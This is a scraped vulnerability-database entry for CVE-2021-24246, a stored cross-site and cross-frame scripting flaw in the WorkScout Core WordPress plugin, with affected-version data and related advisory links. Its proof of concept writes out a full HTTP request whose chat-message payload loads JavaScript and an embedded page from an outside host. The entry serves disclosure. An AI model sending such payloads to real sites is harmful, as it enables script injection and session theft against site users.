Lucene search
M0zeWPVDB-ID:2365A9D0-F6F4-4602-9804-5AF23D0CB11DHistoryApr 08, 2021 - 12:00 a.m.
WorkScout Core < 1.3.4 - Authenticated Stored XSS & XFS
2021-04-0800:00:00
m0ze
wpscan.com
31
0.001 Low
EPSS
Percentile
24.9%
The plugin, used by the WorkScout Theme did not sanitise the chat messages sent via the workscout_send_message_chat AJAX action, leading to Stored Cross-Site Scripting and Cross-Frame Scripting issues
PoC
Payloads: "> POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: https://workscout.in/messages/?action=view&conv;_id=163 Cookie: [user cookies] action=workscout_send_message_chat&recipient;=3&conversation;_id=163&message;=%3C!–%3E%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3C!–%3E%3Cembed%20src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E
| CPE | Name | Operator | Version |
|---|---|---|---|
| workscout-core | lt | 1.3.4 | |
| workscout | lt | 2.0.33 |
Related
cve
cve
CVE-2021-24246
2021-05-06 13:15:11
nvd
nvd
CVE-2021-24246
2021-05-06 13:15:11
prion
prion
Cross site scripting
2021-05-06 13:15:00
cvelist
cvelist
CVE-2021-24246 WorkScout Core < 1.3.4 - Authenticated Stored XSS & XFS
2021-05-05 18:39:43
wpexploit
wpexploit
WorkScout Core < 1.3.4 - Authenticated Stored XSS & XFS
2021-04-08 00:00:00